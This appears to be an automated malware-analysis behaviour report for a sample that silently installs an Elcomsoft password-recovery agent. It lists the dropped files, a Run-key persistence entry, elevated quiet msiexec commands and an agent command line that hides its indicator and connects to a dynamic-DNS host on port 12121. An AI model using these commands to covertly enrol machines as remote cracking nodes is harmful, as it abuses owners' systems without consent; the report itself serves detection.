Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Elcomsoft Distributed Agent' = '"%PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe" -s'
- '%WINDIR%\Installer\MSI14.tmp' ShellUpd.exe
- '%PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe' -s
- '%PROGRAM_FILES%\Elcomsoft\Common Files\epr_worker.exe' -name=espr_server_1
- '%PROGRAM_FILES%\Elcomsoft\Common Files\epr_worker.exe' -name=espr_server_0
- '%WINDIR%\Installer\MSI7.tmp' epr_agent.exe -stop
- '%TEMP%\Elevate.exe' msiexec /i %TEMP%\software.msi /quiet
- '%PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe' -app -server_host=spd.zapto.org -server_port=12121 -hide_indicator=1 -log="%ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\epr_agent.log" -Language=epr_english.lng
- '%WINDIR%\Installer\MSI8.tmp' edpr_reg_to_cfg.exe -agent
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' /i %TEMP%\software.msi /quiet
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\t.bat" "
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_oracle.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_pdf.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_opendoc.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_nt.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_office.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_pfx.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_thebat.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_wpapsk.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_syskey.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_pgp.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_sqlce.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_crypt.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_dcc.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\epr_worker.exe
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_russian.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_spanish.lng
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_eppb.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_mssql.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_notes.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_mozilla.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_md5.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\espr_mig.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\German.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\taccapi.version_key
- %WINDIR%\Installer\{A676A6ED-D043-4F42-98EC-B346CE6AACF3}\epr_agent.exe
- %PROGRAM_FILES%\Elcomsoft\Common Files\taccapi.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_PBKDF2-SHA1_10_1_0100.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_PBKDF2-SHA1_10_1_0100.version_key
- %WINDIR%\Installer\{A676A6ED-D043-4F42-98EC-B346CE6AACF3}\uninstall_icon
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\epr_agent.log
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\taccapi.xml
- %WINDIR%\Installer\MSI14.tmp
- %WINDIR%\Installer\{A676A6ED-D043-4F42-98EC-B346CE6AACF3}\product_icon
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\epr_agent.cfg
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\Russian.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_first_names.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\openmail.exe
- %PROGRAM_FILES%\Elcomsoft\License.rtf
- %PROGRAM_FILES%\Elcomsoft\Common Files\openipc.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_pet_names.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_Office2007_9_1_0120.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\tacc\algorithms\taccAlg_Office2007_9_1_0120.version_key
- %PROGRAM_FILES%\Elcomsoft\Common Files\smartdic.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_surnames.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\russian_vegetation.udic
- %TEMP%\Cab5.tmp
- %WINDIR%\Installer\MSI7.tmp
- %TEMP%\Cab3.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404
- %WINDIR%\Installer\MSI8.tmp
- %TEMP%\CabD.tmp
- %TEMP%\CabF.tmp
- %TEMP%\CabB.tmp
- %WINDIR%\Installer\MSI9.tmp
- C:\Config.Msi\2a8cc.rbs
- %WINDIR%\Installer\2a8c9.msi
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004
- %TEMP%\Elevate.exe
- %TEMP%\software.msi
- %TEMP%\t.bat
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70
- %TEMP%\Cab1.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
- %TEMP%\Cab11.tmp
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_vegetation.udic
- %PROGRAM_FILES%\Elcomsoft\Distributed Password Recovery\epr_agent.exe
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_surnames.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_first_names.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\english_pet_names.udic
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_chinese.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_italian.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_japanese.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_german.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_english.lng
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Languages\epr_french.lng
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_devmgr.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_key.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Help\agent_russian.chm
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Help\agent_english.chm
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Distributed Password Recovery\Help\agent_german.chm
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_lang.xml
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_xml.dll
- %ALLUSERSPROFILE%\Application Data\Elcomsoft Password Recovery\Dictionaries\English.udic
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_reg.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_net.dll
- %PROGRAM_FILES%\Elcomsoft\Common Files\elcom_partners.exml
- %WINDIR%\Installer\MSI9.tmp
- %TEMP%\Cab11.tmp
- %TEMP%\CabF.tmp
- %WINDIR%\Installer\2a8c9.msi
- %WINDIR%\Installer\MSI14.tmp
- C:\Config.Msi\2a8cc.rbs
- %TEMP%\CabD.tmp
- %TEMP%\Cab5.tmp
- %TEMP%\Cab3.tmp
- %TEMP%\Cab1.tmp
- %TEMP%\CabB.tmp
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI7.tmp
- 'cr#.##modoca.com':80
- 'sp#.#apto.org':12121
- 'cr#.##ertrust.com':80
- 'wp#d':80
- 'www.download.windowsupdate.com':80
- cr#.##ertrust.com/UTN-USERFirst-Object.crl
- cr#.##modoca.com/COMODOCodeSigningCA2.crl
- www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- wp#d/wpad.dat
- www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt
- DNS ASK cr#.##modoca.com
- DNS ASK sp#.#apto.org
- DNS ASK cr#.##ertrust.com
- DNS ASK wp#d
- DNS ASK www.download.windowsupdate.com
- ClassName: 'ElcomSoftDistributedAgentWndClassName' WindowName: 'ElcomSoftDistributedAgentWndName'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'